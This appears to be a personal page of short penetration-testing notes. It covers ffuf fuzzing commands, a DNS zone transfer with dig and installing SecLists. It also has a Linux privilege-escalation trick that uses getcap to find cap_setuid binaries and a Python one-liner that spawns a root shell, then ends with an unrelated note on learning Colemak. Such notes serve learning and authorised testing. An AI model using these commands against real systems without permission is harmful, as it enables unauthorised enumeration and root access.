🌱 Seedling notes

Some example ffuf commands

In each case, FUZZ is the placeholder for word replacement.**

Fuzzing for specific extensions

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/target_dir/FUZZ 
  -e .txt,.html,.bak # etc 

Recursive fuzzing

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -u http://example.com/target_dir/FUZZ \
  -recursion

Fuzzing a POST parameter

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/example.php \
  -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "y=FUZZ"
  -ic

Fuzzing a GET parameter

ffuf \
  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
  -u http://example.com/example.php?x=FUZZ \
  -ic

References

• Brute forcing subdomain enumeration 🌿

You can do a DNS zone transfer using dig by using axfr

dig axfr @dns-server.com target.tld

This will return all dns records for target.tld. It’s intended to copy all records from a primary to secondary server and should only happen if trusted, but misconfigured servers may allow unauthorised transfers allowing for enumeration without brute forcing 🌿 .

The seclists from https://github.com/danielmiessler/SecLists ↗️ can be installed on Kali using apt

apt install seclists

They’re installed into /usr/share/seclists/

getcap is a program to get capabilities of others. The one which is a way in is cap_setuid

getcap -r / 2>/dev/null

If anything’s listed which lets you script, you can use that to get a shell. Here’s a Python example:

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Just over a year ago I decided to bite the bullet and try out colemak. I’ve been at it full time on my Corne, by still using qwerty on traditional keyboards.

My findings:

• makes me a vim noob
• wpm has increased but plateaued because I want to retain qwerty memory
• what has been a success is Corne
• reflection: embrace qwerty and touch type on corne